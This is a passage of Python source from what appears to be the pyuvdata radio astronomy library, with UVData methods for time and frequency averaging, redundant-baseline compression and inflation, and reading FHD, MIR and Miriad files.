(temp_Nblts, self.Nfreqs, self.Npols), dtype=self.data_array.dtype,
)
temp_flag = np.zeros(
(temp_Nblts, self.Nfreqs, self.Npols), dtype=self.flag_array.dtype,
)
temp_nsample = np.zeros(
(temp_Nblts, self.Nfreqs, self.Npols),
dtype=self.nsample_array.dtype,
)
else:
temp_data = np.zeros(
(temp_Nblts, 1, self.Nfreqs, self.Npols),
dtype=self.data_array.dtype,
)
temp_flag = np.zeros(
(temp_Nblts, 1, self.Nfreqs, self.Npols),
dtype=self.flag_array.dtype,
)
temp_nsample = np.zeros(
(temp_Nblts, 1, self.Nfreqs, self.Npols),
dtype=self.nsample_array.dtype,
)
temp_idx = 0
for bl in bls_to_downsample:
bl_inds = np.nonzero(self.baseline_array == bl)[0]
running_int_time = 0.0
summing_idx = 0
n_sum = 0
for itime, int_time in enumerate(self.integration_time[bl_inds]):
running_int_time += int_time
n_sum += 1
if min_int_time is not None:
over_min_int_time = running_int_time > min_int_time or np.isclose(
running_int_time,
min_int_time,
rtol=self._integration_time.tols[0],
atol=self._integration_time.tols[1],
)
else:
over_min_int_time = n_sum >= n_times_to_avg
last_sample = itime == len(bl_inds) - 1
# We sum up all the samples found so far if we're over the
# target minimum time, or we've hit the end of the time
# samples for this baseline.
if over_min_int_time or last_sample:
if last_sample and not (over_min_int_time or keep_ragged):
# don't do anything -- implicitly drop these integrations
continue
# sum together that number of samples
temp_baseline[temp_idx] = bl
# this might be wrong if some of the constituent times are
# *totally* flagged
averaging_idx = bl_inds[summing_idx : summing_idx + n_sum]
# take potential non-uniformity of integration_time into account
temp_time[temp_idx] = np.sum(
self.time_array[averaging_idx]
* self.integration_time[averaging_idx]
) / np.sum(self.integration_time[averaging_idx])
temp_int_time[temp_idx] = running_int_time
if not self.metadata_only:
# if all inputs are flagged, the flag array should be True,
# otherwise it should be False.
# The sum below will be zero if it's all flagged and
# greater than zero otherwise
# Then we use a test against 0 to turn it into a Boolean
temp_flag[temp_idx] = (
np.sum(~self.flag_array[averaging_idx], axis=0) == 0
)
mask = self.flag_array[averaging_idx]
# need to update mask if a downsampled visibility will
# be flagged so that we don't set it to zero
if (temp_flag[temp_idx]).any():
if self.future_array_shapes:
ax1_inds, ax2_inds = np.nonzero(temp_flag[temp_idx])
mask[:, ax1_inds, ax2_inds] = False
else:
ax1_inds, ax2_inds, ax3_inds = np.nonzero(
temp_flag[temp_idx]
)
mask[:, ax1_inds, ax2_inds, ax3_inds] = False
masked_data = np.ma.masked_array(
self.data_array[averaging_idx], mask=mask
)
# nsample array is the fraction of data that we actually kept,
# relative to the amount that went into the sum or average
nsample_dtype = self.nsample_array.dtype.type
# promote nsample dtype if half-precision
if nsample_dtype is np.float16:
masked_nsample_dtype = np.float32
else:
masked_nsample_dtype = nsample_dtype
masked_nsample = np.ma.masked_array(
self.nsample_array[averaging_idx],
mask=mask,
dtype=masked_nsample_dtype,
)
if self.future_array_shapes:
int_time_arr = self.integration_time[
averaging_idx, np.newaxis, np.newaxis
]
else:
int_time_arr = self.integration_time[
averaging_idx, np.newaxis, np.newaxis, np.newaxis
]
masked_int_time = np.ma.masked_array(
np.ones_like(
self.data_array[averaging_idx],
dtype=self.integration_time.dtype,
)
* int_time_arr,
mask=mask,
)
if summing_correlator_mode:
temp_data[temp_idx] = np.sum(masked_data, axis=0)
else:
# take potential non-uniformity of integration_time
# and nsamples into account
weights = masked_nsample * masked_int_time
weighted_data = masked_data * weights
temp_data[temp_idx] = np.sum(
weighted_data, axis=0
) / np.sum(weights, axis=0)
# output of masked array calculation should be coerced
# to the datatype of temp_nsample (which has the same
# precision as the original nsample_array)
temp_nsample[temp_idx] = np.sum(
masked_nsample * masked_int_time, axis=0
) / np.sum(self.integration_time[averaging_idx])
# increment counters and reset values
temp_idx += 1
summing_idx += n_sum
running_int_time = 0.0
n_sum = 0
# make sure we've populated the right number of baseline-times
assert temp_idx == temp_Nblts, (
"Wrong number of baselines. Got {:d}, expected {:d}. This is a bug, "
"please make an issue at https://github.com/RadioAstronomySoftwareGroup/"
"pyuvdata/issues".format(temp_idx, temp_Nblts)
)
# harmonize temporary arrays with existing ones
if min_int_time is not None:
bls_not_downsampled = set(self.baseline_array) - set(bls_to_downsample)
inds_to_keep = []
for bl in bls_not_downsampled:
inds_to_keep += np.nonzero(self.baseline_array == bl)[0].tolist()
inds_to_keep = np.array(inds_to_keep, dtype=np.int64)
else:
# no un-downsampled baselines to keep; use an empty integer index array
inds_to_keep = np.array([], dtype=np.int64)
self._harmonize_resample_arrays(
inds_to_keep,
temp_baseline,
temp_time,
temp_int_time,
temp_data,
temp_flag,
temp_nsample,
)
if input_phase_type == "drift" and not allow_drift:
print("Unphasing back to drift mode.")
self.unphase_to_drift()
# reorganize along blt axis
self.reorder_blts(order=blt_order, minor_order=minor_order)
# check the resulting object
self.check()
# add to the history
if min_int_time is not None:
history_update_string = (
" Downsampled data to {:f} second integration "
"time using pyuvdata.".format(min_int_time)
)
else:
history_update_string = (
" Downsampled data by a factor of {} in "
"time using pyuvdata.".format(n_times_to_avg)
)
self.history = self.history + history_update_string
return
def resample_in_time(
self,
target_time,
only_downsample=False,
only_upsample=False,
blt_order="time",
minor_order="baseline",
keep_ragged=True,
summing_correlator_mode=False,
allow_drift=False,
):
"""
Intelligently upsample or downsample a UVData object to the target time.
Parameters
----------
target_time : float
The target integration time to resample to, in seconds.
only_downsample : bool
Option to only call downsample_in_time.
only_upsample : bool
Option to only call upsample_in_time.
blt_order : str
Major baseline ordering for output object. Default is "time". See the
documentation on the `reorder_blts` method for more details.
minor_order : str
Minor baseline ordering for output object. Default is "baseline".
keep_ragged : bool
When averaging baselines that do not evenly divide into the target time,
keep_ragged controls whether to keep the (summed) integrations
corresponding to the remaining samples (keep_ragged=True), or
discard them (keep_ragged=False). Note this option only applies to the
`downsample_in_time` method.
summing_correlator_mode : bool
Option to integrate or split the flux from the original samples
rather than average or duplicate the flux from the original samples
to emulate the behavior in some correlators (e.g. HERA).
allow_drift : bool
Option to allow resampling of drift mode data. If this is False,
drift mode data will be phased before resampling and then unphased
after resampling. Phasing and unphasing can introduce small errors,
but resampling in drift mode may result in unexpected behavior.
Returns
-------
None
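Examples
--------
A minimal usage sketch (the file name is a placeholder): baselines with
integrations shorter than the target are averaged down and baselines with
longer integrations are split up toward an 8 second integration time::

    from pyuvdata import UVData

    uvd = UVData()
    uvd.read("example.uvh5")
    uvd.resample_in_time(8.0)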
"""
# figure out integration times relative to target time
min_int_time = np.amin(self.integration_time)
max_int_time = np.amax(self.integration_time)
if int(np.floor(target_time / min_int_time)) >= 2 and not only_upsample:
downsample = True
else:
downsample = False
if int(np.floor(max_int_time / target_time)) >= 2 and not only_downsample:
upsample = True
else:
upsample = False
if not downsample and not upsample:
warnings.warn(
"No resampling will be done because target time is not "
"a factor of 2 or more off from integration_time. To "
"force resampling set only_upsample or only_downsample "
"keywords or call upsample_in_time or downsample_in_time."
)
return
if downsample:
self.downsample_in_time(
target_time,
blt_order=blt_order,
minor_order=minor_order,
keep_ragged=keep_ragged,
summing_correlator_mode=summing_correlator_mode,
allow_drift=allow_drift,
)
if upsample:
self.upsample_in_time(
target_time,
blt_order=blt_order,
minor_order=minor_order,
summing_correlator_mode=summing_correlator_mode,
allow_drift=allow_drift,
)
return
def frequency_average(
self, n_chan_to_avg, summing_correlator_mode=False, propagate_flags=False
):
"""
Average in frequency.
Does a simple average over an integer number of input channels, leaving
flagged samples out of the average.
In the future, this method will support non-equally spaced channels
and varying channel widths. It will also support setting the frequency
to the true mean of the averaged non-flagged frequencies rather than
the simple mean of the input channel frequencies. For now it does not.
Parameters
----------
n_chan_to_avg : int
Number of channels to average together. If Nfreqs does not divide
evenly by this number, the frequencies at the end of the freq_array
will be dropped to make it evenly divisible. To control which
frequencies are removed, use select before calling this method.
summing_correlator_mode : bool
Option to integrate or split the flux from the original samples
rather than average or duplicate the flux from the original samples
to emulate the behavior in some correlators (e.g. HERA).
propagate_flags: bool
Option to flag an averaged entry even if some of its contributors
are not flagged. The averaged result will still leave the flagged
samples out of the average, except when all contributors are
flagged.
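Examples
--------
A minimal usage sketch (placeholder file name) averaging every two adjacent
channels; afterwards Nfreqs is half its original value (rounded down)::

    from pyuvdata import UVData

    uvd = UVData()
    uvd.read("example.uvh5")
    uvd.frequency_average(2)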
"""
if self.flex_spw:
raise NotImplementedError(
"Frequency averaging not (yet) available for flexible spectral windows"
)
self._check_freq_spacing()
n_final_chan = int(np.floor(self.Nfreqs / n_chan_to_avg))
nfreq_mod_navg = self.Nfreqs % n_chan_to_avg
if nfreq_mod_navg != 0:
# not an even number of final channels
warnings.warn(
"Nfreqs does not divide by `n_chan_to_avg` evenly. "
"The final {} frequencies will be excluded, to "
"control which frequencies to exclude, use a "
"select to control.".format(nfreq_mod_navg)
)
chan_to_keep = np.arange(n_final_chan * n_chan_to_avg)
self.select(freq_chans=chan_to_keep)
if self.future_array_shapes:
self.freq_array = self.freq_array.reshape(
(n_final_chan, n_chan_to_avg)
).mean(axis=1)
self.channel_width = self.channel_width.reshape(
(n_final_chan, n_chan_to_avg)
).sum(axis=1)
else:
self.freq_array = self.freq_array.reshape(
(1, n_final_chan, n_chan_to_avg)
).mean(axis=2)
self.channel_width = self.channel_width * n_chan_to_avg
self.Nfreqs = n_final_chan
if self.eq_coeffs is not None:
eq_coeff_diff = np.diff(self.eq_coeffs, axis=1)
# warn if the coefficients vary at all across frequency
if np.max(np.abs(eq_coeff_diff)) > 0:
warnings.warn(
"eq_coeffs vary by frequency. They should be "
"applied to the data using `remove_eq_coeffs` "
"before frequency averaging."
)
self.eq_coeffs = self.eq_coeffs.reshape(
(self.Nants_telescope, n_final_chan, n_chan_to_avg)
).mean(axis=2)
if not self.metadata_only:
if self.future_array_shapes:
shape_tuple = (
self.Nblts,
n_final_chan,
n_chan_to_avg,
self.Npols,
)
else:
shape_tuple = (
self.Nblts,
1,
n_final_chan,
n_chan_to_avg,
self.Npols,
)
mask = self.flag_array.reshape(shape_tuple)
if propagate_flags:
# if any contributors are flagged, the result should be flagged
if self.future_array_shapes:
self.flag_array = np.any(
self.flag_array.reshape(shape_tuple), axis=2
)
else:
self.flag_array = np.any(
self.flag_array.reshape(shape_tuple), axis=3
)
else:
# if all inputs are flagged, the flag array should be True,
# otherwise it should be False.
# The sum below will be zero if it's all flagged and
# greater than zero otherwise
# Then we use a test against 0 to turn it into a Boolean
if self.future_array_shapes:
self.flag_array = (
np.sum(~self.flag_array.reshape(shape_tuple), axis=2) == 0
)
else:
self.flag_array = (
np.sum(~self.flag_array.reshape(shape_tuple), axis=3) == 0
)
# need to update mask if a downsampled visibility will be flagged
# so that we don't set it to zero
for n_chan in np.arange(n_final_chan):
if self.future_array_shapes:
if (self.flag_array[:, n_chan]).any():
ax0_inds, ax2_inds = np.nonzero(self.flag_array[:, n_chan, :])
# Only if all entries are masked
# May not happen due to propagate_flags keyword
# mask should be left alone otherwise
if np.all(mask[ax0_inds, n_chan, :, ax2_inds]):
mask[ax0_inds, n_chan, :, ax2_inds] = False
else:
if (self.flag_array[:, :, n_chan]).any():
ax0_inds, ax1_inds, ax3_inds = np.nonzero(
self.flag_array[:, :, n_chan, :]
)
# Only if all entries are masked
# May not happen due to propagate_flags keyword
# mask should be left alone otherwise
if np.all(mask[ax0_inds, ax1_inds, n_chan, :, ax3_inds]):
mask[ax0_inds, ax1_inds, n_chan, :, ax3_inds] = False
masked_data = np.ma.masked_array(
self.data_array.reshape(shape_tuple), mask=mask
)
self.nsample_array = self.nsample_array.reshape(shape_tuple)
# promote nsample dtype if half-precision
nsample_dtype = self.nsample_array.dtype.type
if nsample_dtype is np.float16:
masked_nsample_dtype = np.float32
else:
masked_nsample_dtype = nsample_dtype
masked_nsample = np.ma.masked_array(
self.nsample_array, mask=mask, dtype=masked_nsample_dtype
)
if summing_correlator_mode:
if self.future_array_shapes:
self.data_array = np.sum(masked_data, axis=2).data
else:
self.data_array = np.sum(masked_data, axis=3).data
else:
# need to weight by the nsample_array
if self.future_array_shapes:
self.data_array = (
np.sum(masked_data * masked_nsample, axis=2)
/ np.sum(masked_nsample, axis=2)
).data
else:
self.data_array = (
np.sum(masked_data * masked_nsample, axis=3)
/ np.sum(masked_nsample, axis=3)
).data
# nsample array is the fraction of data that we actually kept,
# relative to the amount that went into the sum or average.
# Need to take care to return precision back to original value.
if self.future_array_shapes:
self.nsample_array = (
np.sum(masked_nsample, axis=2) / float(n_chan_to_avg)
).data.astype(nsample_dtype)
else:
self.nsample_array = (
np.sum(masked_nsample, axis=3) / float(n_chan_to_avg)
).data.astype(nsample_dtype)
def get_redundancies(
self,
tol=1.0,
use_antpos=False,
include_conjugates=False,
include_autos=True,
conjugate_bls=False,
):
"""
Get redundant baselines to a given tolerance.
This can be used to identify redundant baselines present in the data,
or find all possible redundant baselines given the antenna positions.
Parameters
----------
tol : float
Redundancy tolerance in meters (default 1m).
use_antpos : bool
Use antenna positions to find all possible redundant groups for this
telescope (default False).
The returned baselines are in the 'u>0' convention.
include_conjugates : bool
Option to include baselines that are redundant under conjugation.
Only used if use_antpos is False.
include_autos : bool
Option to include autocorrelations in the full redundancy list.
Only used if use_antpos is True.
conjugate_bls : bool
If using antenna positions, this will conjugate baselines on this
object to correspond with those in the returned groups.
Returns
-------
baseline_groups : list of lists of int
List of lists of redundant baseline numbers
vec_bin_centers : list of ndarray of float
List of vectors describing redundant group uvw centers
lengths : list of float
List of redundant group baseline lengths in meters
conjugates : list of int, or None, optional
List of indices for baselines that must be conjugated to fit into their
redundant groups.
Will return None if use_antpos is True and include_conjugates is True.
Only returned if include_conjugates is True.
Notes
-----
If use_antpos is set, then this function will find all redundant baseline groups
for this telescope, under the u>0 antenna ordering convention.
If use_antpos is not set, this function will look for redundant groups
in the data.
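Examples
--------
A minimal usage sketch (placeholder file name) that finds the redundant
groups present in the data, allowing baselines that are redundant under
conjugation to be grouped together::

    from pyuvdata import UVData

    uvd = UVData()
    uvd.read("example.uvh5")
    groups, centers, lengths, conjugates = uvd.get_redundancies(
        tol=0.5, include_conjugates=True
    )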
"""
if use_antpos:
antpos, numbers = self.get_ENU_antpos(center=False)
result = uvutils.get_antenna_redundancies(
numbers, antpos, tol=tol, include_autos=include_autos
)
if conjugate_bls:
self.conjugate_bls(convention="u>0", uvw_tol=tol)
if include_conjugates:
result = result + (None,)
return result
_, unique_inds = np.unique(self.baseline_array, return_index=True)
unique_inds.sort()
baseline_vecs = np.take(self.uvw_array, unique_inds, axis=0)
baselines = np.take(self.baseline_array, unique_inds)
return uvutils.get_baseline_redundancies(
baselines, baseline_vecs, tol=tol, with_conjugates=include_conjugates
)
def compress_by_redundancy(
self, method="select", tol=1.0, inplace=True, keep_all_metadata=True
):
"""
Downselect or average to only have one baseline per redundant group.
Either select the first baseline in the redundant group or average over
the baselines in the redundant group.
Uses utility functions to find redundant baselines to the given tolerance,
then select on those.
Parameters
----------
tol : float
Redundancy tolerance in meters (default 1.0).
method : str
Options are "select", which just keeps the first baseline in each
redundant group, or "average", which averages over the baselines in each
redundant group and assigns the average to the first baseline in the group.
inplace : bool
Option to do selection on current object.
keep_all_metadata : bool
Option to keep all the metadata associated with antennas,
even those that do not remain after the select option.
Returns
-------
UVData object or None
if inplace is False, return the compressed UVData object
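Examples
--------
A minimal usage sketch (placeholder file name) that averages each redundant
group onto its first baseline and returns a new, smaller object::

    from pyuvdata import UVData

    uvd = UVData()
    uvd.read("example.uvh5")
    compressed = uvd.compress_by_redundancy(
        method="average", tol=1.0, inplace=False
    )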
"""
allowed_methods = ["select", "average"]
if method not in allowed_methods:
raise ValueError(f"method must be one of {allowed_methods}")
red_gps, centers, lengths, conjugates = self.get_redundancies(
tol, include_conjugates=True
)
bl_ants = [self.baseline_to_antnums(gp[0]) for gp in red_gps]
if method == "average":
# do a metadata only select to get all the metadata right
new_obj = self.copy(metadata_only=True)
new_obj.select(bls=bl_ants, keep_all_metadata=keep_all_metadata)
if not self.metadata_only:
# initialize the data-like arrays
if new_obj.future_array_shapes:
temp_data_array = np.zeros(
(new_obj.Nblts, new_obj.Nfreqs, new_obj.Npols),
dtype=self.data_array.dtype,
)
temp_nsample_array = np.zeros(
(new_obj.Nblts, new_obj.Nfreqs, new_obj.Npols),
dtype=self.nsample_array.dtype,
)
temp_flag_array = np.zeros(
(new_obj.Nblts, new_obj.Nfreqs, new_obj.Npols),
dtype=self.flag_array.dtype,
)
else:
temp_data_array = np.zeros(
(new_obj.Nblts, 1, new_obj.Nfreqs, new_obj.Npols),
dtype=self.data_array.dtype,
)
temp_nsample_array = np.zeros(
(new_obj.Nblts, 1, new_obj.Nfreqs, new_obj.Npols),
dtype=self.nsample_array.dtype,
)
temp_flag_array = np.zeros(
(new_obj.Nblts, 1, new_obj.Nfreqs, new_obj.Npols),
dtype=self.flag_array.dtype,
)
for grp_ind, group in enumerate(red_gps):
if len(conjugates) > 0:
conj_group = set(group).intersection(conjugates)
reg_group = list(set(group) - conj_group)
conj_group = list(conj_group)
else:
reg_group = group
conj_group = []
group_times = []
group_inds = []
conj_group_inds = []
conj_group_times = []
for bl in reg_group:
bl_inds = np.where(self.baseline_array == bl)[0]
group_inds.extend(bl_inds)
group_times.extend(self.time_array[bl_inds])
for bl in conj_group:
bl_inds = np.where(self.baseline_array == bl)[0]
conj_group_inds.extend(bl_inds)
conj_group_times.extend(self.time_array[bl_inds])
group_inds = np.array(group_inds, dtype=np.int64)
conj_group_inds = np.array(conj_group_inds, dtype=np.int64)
# now we have to figure out which times are the same to a tolerance
# so we can average over them.
time_inds = np.arange(len(group_times + conj_group_times))
time_gps = uvutils.find_clusters(
time_inds,
np.array(group_times + conj_group_times),
self._time_array.tols[1],
)
# average over the same times
obj_bl = bl_ants[grp_ind]
obj_inds = new_obj._key2inds(obj_bl)[0]
obj_times = new_obj.time_array[obj_inds]
for gp in time_gps:
# Note that this average time is just used for identifying the
# index to use for the blt axis on the averaged data set.
# We do not update the actual time on that data set because it can
# result in confusing behavior -- small numerical rounding errors
# can result in many more unique times in the final data set than
# in the initial data set.
avg_time = np.average(np.array(group_times + conj_group_times)[gp])
obj_time_ind = np.where(
np.abs(obj_times - avg_time) < self._time_array.tols[1]
)[0]
if obj_time_ind.size == 1:
this_obj_ind = obj_inds[obj_time_ind[0]]
else:
warnings.warn(
"Index baseline in the redundant group does not "
"have all the times, compressed object will be "
"missing those times."
)
continue
# time_ind contains indices for both regular and conjugated bls
# because we needed to group them together in time.
# The regular ones are first and extend the length of group_times,
# so we use that to split them back up.
regular_orientation = np.array(
[time_ind for time_ind in gp if time_ind < len(group_times)],
dtype=np.int64,
)
regular_inds = group_inds[np.array(regular_orientation)]
conj_orientation = np.array(
[
time_ind - len(group_times)
for time_ind in gp
if time_ind >= len(group_times)
],
dtype=np.int64,
)
conj_inds = conj_group_inds[np.array(conj_orientation)]
# check that the integration times are all the same
int_times = np.concatenate(
(
self.integration_time[regular_inds],
self.integration_time[conj_inds],
)
)
if not np.all(
np.abs(int_times - new_obj.integration_time[obj_time_ind])
< new_obj._integration_time.tols[1]
):
warnings.warn(
"Integrations times are not identical in a redundant "
"group. Averaging anyway but this may cause unexpected "
"behavior."
)
if not self.metadata_only:
vis_to_avg = np.concatenate(
(
self.data_array[regular_inds],
np.conj(self.data_array[conj_inds]),
)
)
nsample_to_avg = np.concatenate(
(
self.nsample_array[regular_inds],
self.nsample_array[conj_inds],
)
)
flags_to_avg = np.concatenate(
(self.flag_array[regular_inds], self.flag_array[conj_inds],)
)
# if all data is flagged, average it all as if it were not
if np.all(flags_to_avg):
mask = np.zeros_like(flags_to_avg)
else:
mask = flags_to_avg
vis_to_avg = np.ma.masked_array(vis_to_avg, mask=mask)
nsample_to_avg = np.ma.masked_array(nsample_to_avg, mask=mask)
avg_vis = np.ma.average(
vis_to_avg, weights=nsample_to_avg, axis=0
)
avg_nsample = np.sum(nsample_to_avg, axis=0)
avg_flag = np.all(flags_to_avg, axis=0)
temp_data_array[this_obj_ind] = avg_vis
temp_nsample_array[this_obj_ind] = avg_nsample
temp_flag_array[this_obj_ind] = avg_flag
if inplace:
self.select(bls=bl_ants, keep_all_metadata=keep_all_metadata)
if not self.metadata_only:
self.data_array = temp_data_array
self.nsample_array = temp_nsample_array
self.flag_array = temp_flag_array
self.check()
return
else:
if not self.metadata_only:
new_obj.data_array = temp_data_array
new_obj.nsample_array = temp_nsample_array
new_obj.flag_array = temp_flag_array
new_obj.check()
return new_obj
else:
return self.select(
bls=bl_ants, inplace=inplace, keep_all_metadata=keep_all_metadata
)
def inflate_by_redundancy(self, tol=1.0, blt_order="time", blt_minor_order=None):
"""
Expand data to full size, copying data among redundant baselines.
Note that this method conjugates baselines to the 'u>0' convention in order
to inflate the redundancies.
Parameters
----------
tol : float
Redundancy tolerance in meters, default is 1.0 corresponding to 1 meter.
blt_order : str
string specifying primary order along the blt axis (see `reorder_blts`)
blt_minor_order : str
string specifying minor order along the blt axis (see `reorder_blts`)
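Examples
--------
A minimal round-trip sketch (placeholder file name): compress to one
baseline per redundant group, then inflate back to the full set of
baselines implied by the antenna positions::

    from pyuvdata import UVData

    uvd = UVData()
    uvd.read("example.uvh5")
    uvd.compress_by_redundancy(method="select", tol=1.0)
    uvd.inflate_by_redundancy(tol=1.0)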
"""
self.conjugate_bls(convention="u>0")
red_gps, centers, lengths = self.get_redundancies(
tol=tol, use_antpos=True, conjugate_bls=True
)
# Stack redundant groups into one array.
group_index, bl_array_full = zip(
*[(i, bl) for i, gp in enumerate(red_gps) for bl in gp]
)
# TODO should be an assert that each baseline only ends up in one group
# Map group index to blt indices in the compressed array.
bl_array_comp = self.baseline_array
uniq_bl = np.unique(bl_array_comp)
group_blti = {}
Nblts_full = 0
for i, gp in enumerate(red_gps):
for bl in gp:
# First baseline in the group that is also in the compressed
# baseline array.
if bl in uniq_bl:
group_blti[i] = np.where(bl == bl_array_comp)[0]
# add number of blts for this group
Nblts_full += group_blti[i].size * len(gp)
break
blt_map = np.zeros(Nblts_full, dtype=int)
full_baselines = np.zeros(Nblts_full, dtype=int)
missing = []
counter = 0
for bl, gi in zip(bl_array_full, group_index):
try:
# this makes the time the fastest axis
blt_map[counter : counter + group_blti[gi].size] = group_blti[gi]
full_baselines[counter : counter + group_blti[gi].size] = bl
counter += group_blti[gi].size
except KeyError:
missing.append(bl)
pass
if np.any(missing):
warnings.warn("Missing some redundant groups. Filling in available data.")
# blt_map is an index array mapping compressed blti indices to uncompressed
self.data_array = self.data_array[blt_map, ...]
self.nsample_array = self.nsample_array[blt_map, ...]
self.flag_array = self.flag_array[blt_map, ...]
self.time_array = self.time_array[blt_map]
self.lst_array = self.lst_array[blt_map]
self.integration_time = self.integration_time[blt_map]
self.uvw_array = self.uvw_array[blt_map, ...]
self.baseline_array = full_baselines
self.ant_1_array, self.ant_2_array = self.baseline_to_antnums(
self.baseline_array
)
self.Nants_data = self._calc_nants_data()
self.Nbls = np.unique(self.baseline_array).size
self.Nblts = Nblts_full
if self.phase_center_app_ra is not None:
self.phase_center_app_ra = self.phase_center_app_ra[blt_map]
if self.phase_center_app_dec is not None:
self.phase_center_app_dec = self.phase_center_app_dec[blt_map]
if self.phase_center_frame_pa is not None:
self.phase_center_frame_pa = self.phase_center_frame_pa[blt_map]
if self.multi_phase_center:
self.phase_center_id_array = self.phase_center_id_array[blt_map]
self.reorder_blts(order=blt_order, minor_order=blt_minor_order)
self.check()
def _convert_from_filetype(self, other):
"""
Convert from a file-type specific object to a UVData object.
Used in reads.
Parameters
----------
other : object that inherits from UVData
File type specific object to convert to UVData
"""
for p in other:
param = getattr(other, p)
setattr(self, p, param)
def _convert_to_filetype(self, filetype):
"""
Convert from a UVData object to a file-type specific object.
Used in writes.
Parameters
----------
filetype : str
Specifies what file type object to convert to. Options are: 'uvfits',
'fhd', 'miriad', 'uvh5', 'mir', 'ms'
Raises
------
ValueError
if filetype is not a known type
"""
if filetype == "uvfits":
from . import uvfits
other_obj = uvfits.UVFITS()
elif filetype == "fhd":
from . import fhd
other_obj = fhd.FHD()
elif filetype == "miriad":
from . import miriad
other_obj = miriad.Miriad()
elif filetype == "uvh5":
from . import uvh5
other_obj = uvh5.UVH5()
elif filetype == "mir":
from . import mir
other_obj = mir.Mir()
elif filetype == "ms":
from . import ms
other_obj = ms.MS()
else:
raise ValueError("filetype must be uvfits, mir, miriad, ms, fhd, or uvh5")
for p in self:
param = getattr(self, p)
setattr(other_obj, p, param)
return other_obj
def read_fhd(
self,
filelist,
use_model=False,
axis=None,
read_data=True,
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Read in data from a list of FHD files.
Parameters
----------
filelist : array_like of str
The list/array of FHD save files to read from. Must include at
least one polarization file, a params file, a layout file and a flag file.
An obs file is also required if `read_data` is False.
use_model : bool
Option to read in the model visibilities rather than the dirty
visibilities (the default is False, meaning the dirty visibilities
will be read).
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple data sets are passed.
read_data : bool
Read in the visibility, nsample and flag data. If set to False, only
the metadata will be read in. Setting read_data to False results in
a metadata only object. If read_data is False, an obs file must be
included in the filelist.
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after reading in the file (the default is True,
meaning the check will be run).
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done).
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Raises
------
ValueError
If required files are missing or multiple files for any polarization
are included in filelist.
If there is no recognized key for visibility weights in the flags_file.
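Examples
--------
A minimal usage sketch; the save-file names below are placeholders for a
real FHD output set (at least one polarization file plus params, layout
and flags files)::

    from pyuvdata import UVData

    fhd_files = [
        "vis_XX.sav",
        "vis_YY.sav",
        "params.sav",
        "layout.sav",
        "flags.sav",
    ]
    uvd = UVData()
    uvd.read_fhd(fhd_files)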
"""
from . import fhd
if isinstance(filelist[0], (list, tuple, np.ndarray)):
raise ValueError(
"Reading multiple files from class specific "
"read functions is no longer supported. "
"Use the generic `uvdata.read` function instead."
)
fhd_obj = fhd.FHD()
fhd_obj.read_fhd(
filelist,
use_model=use_model,
background_lsts=background_lsts,
read_data=read_data,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
self._convert_from_filetype(fhd_obj)
del fhd_obj
def read_mir(
self,
filepath,
isource=None,
irec=None,
isb=None,
corrchunk=None,
pseudo_cont=False,
):
"""
Read in data from an SMA MIR file.
Note that with the exception of filepath, the rest of the parameters are
used to sub-select a range of data that matches the limitations of the current
instantiation of pyuvdata -- namely 1 spectral window, 1 source. These could
be dropped in the future, as pyuvdata capabilities grow.
Parameters
----------
filepath : str
The file path to the MIR folder to read from.
isource : int
Source code for MIR dataset
irec : int
Receiver code for MIR dataset
isb : int
Sideband code for MIR dataset
corrchunk : int
Correlator chunk code for MIR dataset
pseudo_cont : bool
Read in only pseudo-continuum values. Default is False.
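Examples
--------
A minimal usage sketch; the folder name is a placeholder for a real SMA MIR
data folder::

    from pyuvdata import UVData

    uvd = UVData()
    uvd.read_mir("example_mir_folder")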
"""
from . import mir
mir_obj = mir.Mir()
mir_obj.read_mir(
filepath,
isource=isource,
irec=irec,
isb=isb,
corrchunk=corrchunk,
pseudo_cont=pseudo_cont,
)
self._convert_from_filetype(mir_obj)
del mir_obj
def read_miriad(
self,
filepath,
axis=None,
antenna_nums=None,
ant_str=None,
bls=None,
polarizations=None,
time_range=None,
read_data=True,
phase_type=None,
correct_lat_lon=True,
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
calc_lst=True,
fix_old_proj=False,
fix_use_ant_pos=True,
):
"""
Read in data from a miriad file.
Parameters
----------
filepath : str
The miriad root directory to read from.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple files are passed.
antenna_nums : array_like of int, optional
The antenna numbers to read into the object.
bls : list of tuple, optional
A list of antenna number tuples (e.g. [(0, 1), (3, 2)]) or a list of
baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]) specifying baselines
to include when reading data into the object. For length-2 tuples,
the ordering of the numbers within the tuple does not matter. For
length-3 tuples, the polarization string is in the order of the two
antennas. If length-3 tuples are provided, `polarizations` must be
None.
ant_str : str, optional
A string containing information about what antenna numbers
and polarizations to include when reading data into the object.
Can be 'auto', 'cross', 'all', or combinations of antenna numbers
and polarizations (e.g. '1', '1_2', '1x_2y'). See tutorial for more
examples of valid strings and the behavior of different forms for ant_str.
If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
An ant_str cannot be passed in addition to any of `antenna_nums`,
`bls` or `polarizations` parameters; if it is, a ValueError will be raised.
polarizations : array_like of int or str, optional
List of polarization integers or strings to read-in. e.g. ['xx', 'yy', ...]
time_range : list of float, optional
len-2 list containing min and max range of times in Julian Date to
include when reading data into the object. e.g. [2458115.20, 2458115.40]
read_data : bool
Read in the visibility and flag data. If set to false,
only the metadata will be read in. Setting read_data to False
results in an incompletely defined object (check will not pass).
phase_type : str, optional
Option to specify the phasing status of the data. Options are 'drift',
